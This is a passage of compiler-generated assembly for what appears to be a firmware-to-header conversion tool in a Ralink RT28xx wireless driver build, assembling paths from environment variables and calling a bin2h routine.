## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1552(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2064(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2576(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4624(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -7696(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -8208(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -7184(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5648(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -6160(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -6672(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk movl $0, -11684(%rbp) movl $0, -11688(%rbp) movl $0, -11692(%rbp) leaq -528(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3600(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4112(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4624(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -7696(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -8208(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.32(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1552(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2064(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2576(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5648(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -6160(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -6672(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3088(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -7184(%rbp), %rdi leaq L_.str.31(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -528(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3600(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4112(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3088(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1552(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2064(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2576(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -528(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3600(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4112(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -3088(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1552(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2064(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -2576(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk movq -11640(%rbp), %rdi leaq L_.str.34(%rip), %rsi movl $7, %edx callq _strncmp cmpl $0, %eax jne LBB1_30 ## %bb.23: ## in Loop: Header=BB1_21 Depth=1 leaq -1552(%rbp), %rdi leaq L_.str.35(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5648(%rbp), %rdi leaq L_.str.36(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9680(%rbp), %rdi leaq L_.str.37(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -2576(%rbp), %rdi leaq L_.str.38(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -6672(%rbp), %rdi leaq L_.str.39(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9936(%rbp), %rdi leaq L_.str.40(%rip), %rsi movl $128, %edx callq ___strcat_chk movq -11672(%rbp), %rdi leaq L_.str.41(%rip), %rsi movl $1, %edx callq _strncmp cmpl $0, %eax jne LBB1_25 ## %bb.24: ## in Loop: Header=BB1_21 Depth=1 leaq -528(%rbp), %rdi leaq L_.str.42(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk jmp LBB1_26 LBB1_25: ## in Loop: Header=BB1_21 Depth=1 leaq -528(%rbp), %rdi leaq L_.str.43(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4112(%rbp), %rdi leaq L_.str.44(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk LBB1_26: ## in Loop: Header=BB1_21 Depth=1 leaq -8208(%rbp), %rdi leaq L_.str.45(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10192(%rbp), %rdi leaq L_.str.46(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -4624(%rbp), %rdi leaq L_.str.47(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9424(%rbp), %rdi leaq L_.str.48(%rip), %rsi movl $128, %edx callq ___strcat_chk movq -11680(%rbp), %rdi leaq L_.str.41(%rip), %rsi movl $1, %edx callq _strncmp cmpl $0, %eax jne LBB1_28 ## %bb.27: ## in Loop: Header=BB1_21 Depth=1 leaq -3088(%rbp), %rdi leaq L_.str.49(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk jmp LBB1_29 LBB1_28: ## in Loop: Header=BB1_21 Depth=1 leaq -3088(%rbp), %rdi leaq L_.str.50(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk LBB1_29: ## in Loop: Header=BB1_21 Depth=1 leaq -7184(%rbp), %rdi leaq L_.str.51(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10320(%rbp), %rdi leaq L_.str.52(%rip), %rsi movl $128, %edx callq ___strcat_chk movl $1, -11688(%rbp) movl $1, -11700(%rbp) movl $1, -11684(%rbp) leaq -10832(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -11344(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -9552(%rbp), %rdi leaq L_.str.53(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11472(%rbp), %rdi leaq L_.str.54(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11600(%rbp), %rdi leaq L_.str.55(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.56(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq L_.str.57(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -11344(%rbp), %rdi leaq L_.str.58(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.59(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h leaq -10832(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11472(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -11344(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11600(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -1040(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -10832(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -11344(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5136(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9552(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11472(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11600(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -1040(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -11344(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -9552(%rbp), %rdi leaq L_.str.62(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11472(%rbp), %rdi leaq L_.str.63(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11600(%rbp), %rdi leaq L_.str.64(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.65(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq L_.str.66(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -11344(%rbp), %rdi leaq L_.str.67(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.32(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.68(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h leaq -10832(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11472(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -11344(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11600(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -1040(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -10832(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -11344(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5136(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9552(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11472(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11600(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -1040(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -11344(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -9552(%rbp), %rdi leaq L_.str.69(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11472(%rbp), %rdi leaq L_.str.70(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11600(%rbp), %rdi leaq L_.str.71(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.72(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq L_.str.73(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -11344(%rbp), %rdi leaq L_.str.74(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.32(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.75(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h leaq -10832(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11472(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -11344(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11600(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -1040(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -10832(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -11344(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5136(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9552(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11472(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -11600(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -1040(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -11344(%rbp), %rdi leaq -1040(%rbp), %rsi movl $512, %ecx ## imm = 0x200 movq %rcx, %rdx callq ___strncpy_chk leaq -9552(%rbp), %rdi leaq L_.str.76(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11472(%rbp), %rdi leaq L_.str.77(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -11600(%rbp), %rdi leaq L_.str.78(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.79(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -10832(%rbp), %rdi leaq L_.str.80(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -11344(%rbp), %rdi leaq L_.str.81(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.32(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.82(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h leaq -10832(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11472(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h leaq -11344(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11600(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h jmp LBB1_37 LBB1_30: ## in Loop: Header=BB1_21 Depth=1 movq -11640(%rbp), %rdi leaq L_.str.83(%rip), %rsi movl $7, %edx callq _strncmp cmpl $0, %eax jne LBB1_35 ## %bb.31: ## in Loop: Header=BB1_21 Depth=1 leaq -1552(%rbp), %rdi leaq L_.str.84(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5648(%rbp), %rdi leaq L_.str.85(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9680(%rbp), %rdi leaq L_.str.86(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -2064(%rbp), %rdi leaq L_.str.87(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -6160(%rbp), %rdi leaq L_.str.88(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9808(%rbp), %rdi leaq L_.str.89(%rip), %rsi movl $128, %edx callq ___strcat_chk movq -11672(%rbp), %rdi leaq L_.str.41(%rip), %rsi movl $1, %edx callq _strncmp cmpl $0, %eax jne LBB1_33 ## %bb.32: ## in Loop: Header=BB1_21 Depth=1 leaq -528(%rbp), %rdi leaq L_.str.90(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk jmp LBB1_34 LBB1_33: ## in Loop: Header=BB1_21 Depth=1 leaq -528(%rbp), %rdi leaq L_.str.91(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk LBB1_34: ## in Loop: Header=BB1_21 Depth=1 leaq -3600(%rbp), %rdi leaq L_.str.92(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -4624(%rbp), %rdi leaq L_.str.93(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -7696(%rbp), %rdi leaq L_.str.94(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9424(%rbp), %rdi leaq L_.str.95(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -10064(%rbp), %rdi leaq L_.str.96(%rip), %rsi movl $128, %edx callq ___strcat_chk movl $1, -11684(%rbp) movl $1, -11688(%rbp) movl $1, -11696(%rbp) leaq -9552(%rbp), %rdi leaq L_.str.97(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.98(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.99(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h leaq -1040(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5136(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9552(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -1040(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9552(%rbp), %rdi leaq L_.str.100(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.101(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.32(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.102(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h leaq -1040(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -5136(%rbp), %rdi xorl %esi, %esi movl $512, %edx ## imm = 0x200 callq _memset leaq -9552(%rbp), %rdi xorl %esi, %esi movl $128, %edx callq _memset leaq -1040(%rbp), %rdi movq -11632(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.30(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi movq -11640(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.33(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -9552(%rbp), %rdi leaq L_.str.103(%rip), %rsi movl $128, %edx callq ___strcat_chk leaq -1040(%rbp), %rdi leaq L_.str.104(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi movq -11624(%rbp), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.32(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -5136(%rbp), %rdi leaq L_.str.105(%rip), %rsi movl $512, %edx ## imm = 0x200 callq ___strcat_chk leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h jmp LBB1_36 LBB1_35: ## in Loop: Header=BB1_21 Depth=1 movq -11640(%rbp), %rsi leaq L_.str.106(%rip), %rdi movb $0, %al callq _printf LBB1_36: ## in Loop: Header=BB1_21 Depth=1 jmp LBB1_37 LBB1_37: ## in Loop: Header=BB1_21 Depth=1 cmpl $0, -11684(%rbp) je LBB1_47 ## %bb.38: ## in Loop: Header=BB1_21 Depth=1 leaq -9424(%rbp), %rdi callq _strlen cmpq $0, %rax je LBB1_40 ## %bb.39: ## in Loop: Header=BB1_21 Depth=1 leaq -528(%rbp), %rdi leaq -4624(%rbp), %rsi leaq -9424(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_40: ## in Loop: Header=BB1_21 Depth=1 leaq -10064(%rbp), %rdi callq _strlen cmpq $0, %rax je LBB1_42 ## %bb.41: ## in Loop: Header=BB1_21 Depth=1 leaq -3600(%rbp), %rdi leaq -7696(%rbp), %rsi leaq -10064(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_42: ## in Loop: Header=BB1_21 Depth=1 leaq -10192(%rbp), %rdi callq _strlen cmpq $0, %rax je LBB1_44 ## %bb.43: ## in Loop: Header=BB1_21 Depth=1 leaq -4112(%rbp), %rdi leaq -8208(%rbp), %rsi leaq -10192(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_44: ## in Loop: Header=BB1_21 Depth=1 leaq -10320(%rbp), %rdi callq _strlen cmpq $0, %rax je LBB1_46 ## %bb.45: ## in Loop: Header=BB1_21 Depth=1 leaq -3088(%rbp), %rdi leaq -7184(%rbp), %rsi leaq -10320(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_46: ## in Loop: Header=BB1_21 Depth=1 jmp LBB1_47 LBB1_47: ## in Loop: Header=BB1_21 Depth=1 cmpl $0, -11688(%rbp) je LBB1_49 ## %bb.48: ## in Loop: Header=BB1_21 Depth=1 leaq -1552(%rbp), %rdi leaq -5648(%rbp), %rsi leaq -9680(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_49: ## in Loop: Header=BB1_21 Depth=1 cmpl $0, -11696(%rbp) je LBB1_51 ## %bb.50: ## in Loop: Header=BB1_21 Depth=1 leaq -2064(%rbp), %rdi leaq -6160(%rbp), %rsi leaq -9808(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_51: ## in Loop: Header=BB1_21 Depth=1 cmpl $0, -11700(%rbp) je LBB1_53 ## %bb.52: ## in Loop: Header=BB1_21 Depth=1 leaq -2576(%rbp), %rdi leaq -6672(%rbp), %rsi leaq -9936(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h LBB1_53: ## in Loop: Header=BB1_21 Depth=1 cmpl $0, -11692(%rbp) je LBB1_59 ## %bb.54: ## in Loop: Header=BB1_21 Depth=1 leaq -1040(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -9552(%rbp), %rdx leaq L_.str.60(%rip), %rcx callq _bin2h cmpb $0, -11472(%rbp) je LBB1_56 ## %bb.55: ## in Loop: Header=BB1_21 Depth=1 leaq -10832(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11472(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h LBB1_56: ## in Loop: Header=BB1_21 Depth=1 cmpb $0, -11600(%rbp) je LBB1_58 ## %bb.57: ## in Loop: Header=BB1_21 Depth=1 leaq -11344(%rbp), %rdi leaq -5136(%rbp), %rsi leaq -11600(%rbp), %rdx leaq L_.str.61(%rip), %rcx callq _bin2h LBB1_58: ## in Loop: Header=BB1_21 Depth=1 jmp LBB1_59 LBB1_59: ## in Loop: Header=BB1_21 Depth=1 xorl %eax, %eax movl %eax, %edi leaq L_.str.7(%rip), %rsi callq _strtok movq %rax, -11640(%rbp) jmp LBB1_21 LBB1_60: xorl %edi, %edi callq _exit LBB1_61: movl -11604(%rbp), %eax movl %eax, -11756(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB1_63 ## %bb.62: movl -11756(%rbp), %eax ## 4-byte Reload addq $11760, %rsp ## imm = 0x2DF0 popq %rbp retq LBB1_63: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "r" L_.str.1: ## @.str.1 .asciz "Can't read file %s\n" L_.str.2: ## @.str.2 .asciz "Can't open write file %s\n" L_.str.3: ## @.str.3 .asciz "/* AUTO GEN PLEASE DO NOT MODIFY IT */\n" L_.str.4: ## @.str.4 .asciz "\n" L_.str.5: ## @.str.5 .asciz "UCHAR %s[] = {\n" L_.str.6: ## @.str.6 .asciz "\t" L_.str.7: ## @.str.7 .asciz " " L_.str.8: ## @.str.8 .asciz "0x" L_.str.9: ## @.str.9 .asciz "%02x" L_.str.10: ## @.str.10 .asciz "," L_.str.11: ## @.str.11 .asciz "\n};\n" L_.str.12: ## @.str.12 .asciz "RT28xx_DIR" L_.str.13: ## @.str.13 .asciz "RT28xx_BIN_DIR" L_.str.14: ## @.str.14 .asciz "CHIPSET" L_.str.15: ## @.str.15 .asciz "HAS_WOW_SUPPORT" L_.str.16: ## @.str.16 .asciz "HAS_FPGA_MODE" L_.str.17: ## @.str.17 .asciz "HAS_RX_CUT_THROUGH" L_.str.18: ## @.str.18 .asciz "RT28xx_MODE" L_.str.19: ## @.str.19 .asciz "Environment value \"RT28xx_DIR\" not export\n" L_.str.20: ## @.str.20 .asciz "Environment value \"RT28xx_BIN_DIR\" not export\n" 